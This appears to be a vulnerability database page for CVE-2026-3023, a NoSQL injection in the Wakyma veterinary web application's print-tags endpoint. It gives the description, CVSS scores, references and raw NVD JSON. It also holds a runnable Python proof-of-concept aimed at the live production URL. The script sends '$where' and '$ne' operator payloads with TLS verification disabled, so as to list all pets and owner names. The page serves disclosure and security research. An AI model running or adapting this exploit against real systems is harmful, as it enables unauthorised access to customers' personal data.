CVE-2026-3023

Description

Non-relational SQL injection vulnerability (NoSQLi) in the Wakyma web application, specifically in the endpoint 'vets.wakyma.com/pets/print-tags'. This vulnerability could allow an authenticated user to alter a POST request to the affected endpoint for the purpose of injecting NoSQL commands, allowing them to list both pets and owner names.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wakyma:wakyma:-:*:*:*:*:*:*:* - VULNERABLE

Wakyma web application (all versions prior to patch)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2026-3023 NoSQL Injection PoC
# Target: Wakyma web application - /pets/print-tags endpoint

import requests
import json

TARGET_URL = "https://vets.wakyma.com/pets/print-tags"

# Normal request payload (baseline)
normal_payload = {
    "pet_id": "12345",
    "format": "label"
}

# Malicious payload - NoSQL injection to extract all pets and owners
nosql_injection_payload = {
    "pet_id": {"$where": "function() { return true; }"},
    "format": "label"
}

# Alternative payload to extract owner names
owner_extraction_payload = {
    "pet_id": {"$ne": ""},
    "owner_name": {"$exists": True},
    "format": "label"
}

def exploit_nosql_injection():
    """
    Exploit NoSQL injection vulnerability in Wakyma application
    This PoC demonstrates how an authenticated user can inject NoSQL commands
    to extract sensitive pet and owner information from the database.
    """
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer <AUTH_TOKEN>"  # Requires low-privilege auth
    }
    
    print("[*] Sending malicious NoSQL injection request...")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Payload: {json.dumps(nosql_injection_payload)}")
    
    try:
        response = requests.post(
            TARGET_URL,
            json=nosql_injection_payload,
            headers=headers,
            timeout=30,
            verify=False
        )
        
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text[:500]}")
        
        if response.status_code == 200:
            data = response.json()
            print("[!] Vulnerability confirmed - NoSQL injection successful!")
            print(f"[!] Extracted data sample: {json.dumps(data, indent=2)}")
            return True
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    exploit_nosql_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3023
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3023
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3023/
[4] VulDB https://vuldb.com/cve/CVE-2026-3023
[5] https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wakyma-application-web

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3023", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:45.663", "lastModified": "2026-03-19T20:04:19.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Non-relational SQL injection vulnerability (NoSQLi) in the Wakyma web application, specifically in the endpoint 'vets.wakyma.com/pets/print-tags'. This vulnerability could allow an authenticated user to alter a POST request to the affected endpoint for the purpose of injecting NoSQL commands, allowing them to list both pets and owner names."}, {"lang": "es", "value": "Vulnerabilidad de inyección SQL no relacional (NoSQLi) en la aplicación web Wakyma, específicamente en el endpoint 'vets.wakyma.com/pets/print-tags'. Esta vulnerabilidad podría permitir a un usuario autenticado alterar una solicitud POST al endpoint afectado con el propósito de inyectar comandos NoSQL, permitiéndoles listar tanto mascotas como nombres de propietarios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-943"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wakyma:wakyma:-:*:*:*:*:*:*:*", "matchCriteriaId": "5E72E411-C3E6-4BC9-81BD-E6F33F0C0174"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wakyma-application-web", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}